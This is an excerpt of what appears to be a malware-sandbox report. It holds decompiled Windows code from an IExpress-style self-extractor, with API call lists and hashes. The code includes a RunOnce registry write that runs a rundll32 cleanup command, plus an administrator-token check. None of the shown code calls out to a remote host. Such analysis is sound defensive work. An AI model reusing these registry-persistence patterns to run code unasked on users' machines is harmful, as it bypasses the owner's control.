                                                                                                                                                                                                                                            				_t61 = __ecx;
                                                                                                                                                                                                                                            				_v276 = _t62;
                                                                                                                                                                                                                                            				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                            				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t64 = _t62 + 1;
                                                                                                                                                                                                                                            					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                            					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					_t34 = _v269;
                                                                                                                                                                                                                                            					if(_t34 == 0x53) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 == 0x57) {
                                                                                                                                                                                                                                            							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(_t52);
                                                                                                                                                                                                                                            							_v288 = 0x104;
                                                                                                                                                                                                                                            							E00321781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                            							_t59 = 0x104;
                                                                                                                                                                                                                                            							E0032658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                            							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                            								L16:
                                                                                                                                                                                                                                            								_t59 = _t63;
                                                                                                                                                                                                                                            								E0032658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								if(RegQueryValueExA(_v284, 0x321140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                            									_t45 = _v280;
                                                                                                                                                                                                                                            									if(_t45 != 2) {
                                                                                                                                                                                                                                            										L9:
                                                                                                                                                                                                                                            										if(_t45 == 1) {
                                                                                                                                                                                                                                            											goto L10;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            											_t45 = _v280;
                                                                                                                                                                                                                                            											goto L9;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t59 = 0x104;
                                                                                                                                                                                                                                            											E00321680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                            											L10:
                                                                                                                                                                                                                                            											_t50 = 1;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								RegCloseKey(_v284);
                                                                                                                                                                                                                                            								L15:
                                                                                                                                                                                                                                            								if(_t50 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharUpperA.USER32(2C4B51C8,00000000,00000000,00000000), ref: 003227A8
                                                                                                                                                                                                                                            • CharNextA.USER32(0000054D), ref: 003227B5
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 003227BC
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00322829
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00321140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00322852
                                                                                                                                                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00322870
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003228A0
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 003228AA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 003228B9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 003227E4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                            • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                            • Opcode ID: 0541825808ae35e36988e0c4fa1c823c74f65fcf5e19a4b9d51481dbb361ac42
                                                                                                                                                                                                                                            • Instruction ID: eb4eca6058ad4c7576d9663b33ec3ba5c4c18a84bfd43770dcc1066528f26823
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0541825808ae35e36988e0c4fa1c823c74f65fcf5e19a4b9d51481dbb361ac42
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E419371E0013CAFDB269B64AC85AEF77BDEF55700F0140A9F549D2110DBB09E869FA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                                                                            			E00322267() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v836;
                                                                                                                                                                                                                                            				void* _v840;
                                                                                                                                                                                                                                            				int _v844;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t42;
                                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t19 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				if( *0x328530 != 0) {
                                                                                                                                                                                                                                            					_push(_t49);
                                                                                                                                                                                                                                            					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                            						_push(_t38);
                                                                                                                                                                                                                                            						_v844 = 0x238;
                                                                                                                                                                                                                                            						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                            							_push(_t47);
                                                                                                                                                                                                                                            							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            								E0032658A( &_v268, 0x104, 0x321140);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            							E0032171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                            							_t42 =  &_v836;
                                                                                                                                                                                                                                            							_t45 = _t42 + 1;
                                                                                                                                                                                                                                            							_pop(_t47);
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t33 =  *_t42;
                                                                                                                                                                                                                                            								_t42 = _t42 + 1;
                                                                                                                                                                                                                                            							} while (_t33 != 0);
                                                                                                                                                                                                                                            							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                            						_pop(_t38);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_pop(_t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 003222A3
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 003222D8
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 003222F5
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00322305
                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0032236E
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0032237A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • wextract_cleanup1, xrefs: 0032227C, 003222CD, 00322363
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00322321
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00322299
                                                                                                                                                                                                                                            • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0032232D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                                                                                                                                                                                            • API String ID: 3027380567-2048191181
                                                                                                                                                                                                                                            • Opcode ID: 6e11c6ef491cac7eaeb3ac1d0966f01754a350c59c97a378d8b9aa28eb7b70dc
                                                                                                                                                                                                                                            • Instruction ID: 1487df983fd5530660672154d388d319abadef49587fb325dd39ee2708ec11f8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e11c6ef491cac7eaeb3ac1d0966f01754a350c59c97a378d8b9aa28eb7b70dc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D318475A002287BDB23DB51EC49FDB777CEF55710F0001A9F54DAA051DA71AB89CA50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                                            			E00323100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            				struct HWND__* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					if( *0x328590 == 0) {
                                                                                                                                                                                                                                            						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                            						 *0x328590 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t8 - 1;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                            					EndDialog(_a4, ??);
                                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                            				if(_t15 == 0) {
                                                                                                                                                                                                                                            					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t33 = _a4;
                                                                                                                                                                                                                                            					E003243D0(_t33, _t16);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t33, 0x834,  *0x328d4c);
                                                                                                                                                                                                                                            					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                                                            					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                            					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                            					 *0x3288b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                            					SetWindowLongA(_t34, 0xfffffffc, E003230C0);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t15 != 1) {
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a12 != 6) {
                                                                                                                                                                                                                                            					if(_a12 != 7) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				goto L8;
                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 0032313B
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0032314B
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000834), ref: 0032316A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,cent), ref: 00323176
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0032317D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000834), ref: 00323185
                                                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000FC), ref: 00323190
                                                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,003230C0), ref: 003231A3
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 003231CA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                            • String ID: cent
                                                                                                                                                                                                                                            • API String ID: 3785188418-3940384054
                                                                                                                                                                                                                                            • Opcode ID: a872adb4a06e1668fa1643465e30eb5496a16036e02727afb50d341bcf192bf4
                                                                                                                                                                                                                                            • Instruction ID: dbbcba6bcc88df969d1b45d2f348226155effa0f0f90e260bc554e308a6eede0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a872adb4a06e1668fa1643465e30eb5496a16036e02727afb50d341bcf192bf4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C11B431205625BBDB336F24BC0DBAA3A6CFB46730F110618F915D11E0DB78A662D792
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                            			E003218A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t51 = __esi;
                                                                                                                                                                                                                                            				_t49 = __edx;
                                                                                                                                                                                                                                            				_t23 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                            				_t25 =  *0x328128; // 0x2
                                                                                                                                                                                                                                            				_t45 = 0;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t50 = 2;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if(_t25 != _t50) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					return E00326CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E003217EE( &_v20) != 0) {
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					if(_v20 != 0) {
                                                                                                                                                                                                                                            						 *0x328128 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                            					CloseHandle(_v28);
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_push(__esi);
                                                                                                                                                                                                                                            					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                            					if(_t52 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_pop(_t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                            						L15:
                                                                                                                                                                                                                                            						LocalFree(_t52);
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if( *_t52 <= 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							FreeSid(_v32);
                                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                            						_t50 = _t15;
                                                                                                                                                                                                                                            						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                            							_t45 = _t45 + 1;
                                                                                                                                                                                                                                            							_t50 = _t50 + 8;
                                                                                                                                                                                                                                            							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x328128 = 1;
                                                                                                                                                                                                                                            						_v20 = 1;
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 003217EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003218DD), ref: 0032181A
                                                                                                                                                                                                                                              • Part of subcall function 003217EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0032182C
                                                                                                                                                                                                                                              • Part of subcall function 003217EE: AllocateAndInitializeSid.ADVAPI32(003218DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003218DD), ref: 00321855
                                                                                                                                                                                                                                              • Part of subcall function 003217EE: FreeSid.ADVAPI32(?,?,?,?,003218DD), ref: 00321883
                                                                                                                                                                                                                                              • Part of subcall function 003217EE: FreeLibrary.KERNEL32(00000000,?,?,?,003218DD), ref: 0032188A
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 003218EB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 003218F2
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0032190A
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00321918
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,?,?), ref: 0032192C
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00321944
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00321964
                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(00000004,?), ref: 0032197A
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?), ref: 0032199C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003219A3
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 003219AD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2168512254-0
                                                                                                                                                                                                                                            • Opcode ID: 7f8ab9e78f7b3b680fa90f8dcd3aa7e05c9155a827d6e78d17293a29f1bea5b8
                                                                                                                                                                                                                                            • Instruction ID: d99558c18282bf1b86f854eaca2979b4b4fc2abe221bc6793bbbb22710492382
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f8ab9e78f7b3b680fa90f8dcd3aa7e05c9155a827d6e78d17293a29f1bea5b8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2316F71A00219AFDB22DFA5ED48EBFBBBCFF18710F104429E545D2150DB309946CBA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E0032468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				CHAR* _t14;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				long _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 = __ecx;
                                                                                                                                                                                                                                            				_t11 = __edx;
                                                                                                                                                                                                                                            				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                            				_t16 = _t4;
                                                                                                                                                                                                                                            				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                            					if(_t16 == 0) {
                                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                            					FreeResource(_t15);
                                                                                                                                                                                                                                            					return _t16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246A0
                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246A9
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246C3
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246CC
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246D3
                                                                                                                                                                                                                                            • memcpy_s.MSVCRT ref: 003246E5
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003246EF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
